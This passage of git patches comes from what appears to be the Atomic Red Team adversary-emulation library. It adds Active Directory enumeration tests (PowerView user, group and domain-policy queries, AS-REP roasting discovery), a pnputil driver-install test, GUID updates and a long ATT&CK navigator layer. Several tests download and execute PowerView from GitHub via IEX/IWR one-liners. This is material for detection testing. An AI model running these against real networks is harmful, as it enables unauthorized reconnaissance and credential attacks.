-## Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) +## Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) When successful, accounts that do not require kerberos pre-auth will be returned. Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html @@ -397,7 +431,7 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.

-## Atomic Test #11 - Get-DomainGroupMember with PowerView +## Atomic Test #12 - Get-DomainGroupMember with PowerView Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed. **Supported Platforms:** Windows @@ -423,4 +457,33 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/R +
+
+ +## Atomic Test #13 - Get-DomainGroup with PowerView +Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 5a8a181c-2c8e-478d-a943-549305a01230 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose +``` + + + + + +
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md index 55e4e2bd..8c53c827 100644 --- a/atomics/T1087.002/T1087.002.md +++ b/atomics/T1087.002/T1087.002.md @@ -26,7 +26,9 @@ Commands such as net user /domain and net group /domain @@ -446,7 +448,36 @@ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {

-## Atomic Test #11 - Enumerate Active Directory Users with ADSISearcher +## Atomic Test #11 - Get-DomainUser with PowerView +Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 93662494-5ed7-4454-a04c-8c8372808ac2 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose +``` + + + + + + +
+
+ +## Atomic Test #12 - Enumerate Active Directory Users with ADSISearcher The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index e2953cf8..3f1dc931 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -20,6 +20,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems - [Atomic Test #7 - Examine password policy - macOS](#atomic-test-7---examine-password-policy---macos) +- [Atomic Test #8 - Get-DomainPolicy with PowerView](#atomic-test-8---get-domainpolicy-with-powerview) + +- [Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy](#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy) +
@@ -241,4 +245,63 @@ pwpolicy getaccountpolicies +
+
+ +## Atomic Test #8 - Get-DomainPolicy with PowerView +Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose +``` + + + + + + +
+
+ +## Atomic Test #9 - Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy +The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy. +Upon successful execution a listing of the policy implemented will display. +Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps + +**Supported Platforms:** Windows + + +**auto_generated_guid:** b2698b33-984c-4a1c-93bb-e4ba72a0babb + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +get-addefaultdomainpasswordpolicy +``` + + + + + +
From f6a8e78538d71f5b1518c1e078fa1767c3ccc9ef Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 14 Mar 2022 18:38:08 +0100 Subject: [PATCH 31/83] pnputil lolbin (#1808) * pnputil lolbin * spelling Co-authored-by: Carrie Roberts --- atomics/T1547/T1547.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 atomics/T1547/T1547.yaml diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml new file mode 100644 index 00000000..c3fbc845 --- /dev/null +++ b/atomics/T1547/T1547.yaml @@ -0,0 +1,17 @@ +attack_technique: T1547 +display_name: 'Boot or Logon Autostart Execution' +atomic_tests: +- name: Add a driver + description: | + Install a driver via pnputil.exe lolbin + supported_platforms: + - windows + input_arguments: + driver_inf: + description: A built-in, already installed windows driver inf + type: Path + default: 'C:\Windows\INF\usbstor.inf' + executor: + command: | + pnputil.exe /add-driver "#{driver_inf}" + name: command_prompt From 0f87abb8652746e3b210b13bcdb4b7fb047b4bc1 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 17:38:42 +0000 Subject: [PATCH 32/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1547/T1547.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1547/T1547.yaml b/atomics/T1547/T1547.yaml index c3fbc845..a9cab92e 100644 --- a/atomics/T1547/T1547.yaml +++ b/atomics/T1547/T1547.yaml @@ -2,6 +2,7 @@ attack_technique: T1547 display_name: 'Boot or Logon Autostart Execution' atomic_tests: - name: Add a driver + auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785 description: | Install a driver via pnputil.exe lolbin supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index b8ce28f8..00099f88 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
@@ -898,3 +898,4 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad 93662494-5ed7-4454-a04c-8c8372808ac2 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 b2698b33-984c-4a1c-93bb-e4ba72a0babb +cb01b3da-b0e7-4e24-bf6d-de5223526785 From 042bd99bdda5f6220566b75903e45957b200e827 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 17:38:48 +0000 Subject: [PATCH 33/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 6 ++- .../Indexes/Indexes-Markdown/windows-index.md | 6 ++- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 40 ++++++++++++++++- atomics/T1547/T1547.md | 44 +++++++++++++++++++ 10 files changed, 99 insertions(+), 11 deletions(-) create mode 100644 atomics/T1547/T1547.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 6cc97475..8fa94501 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View 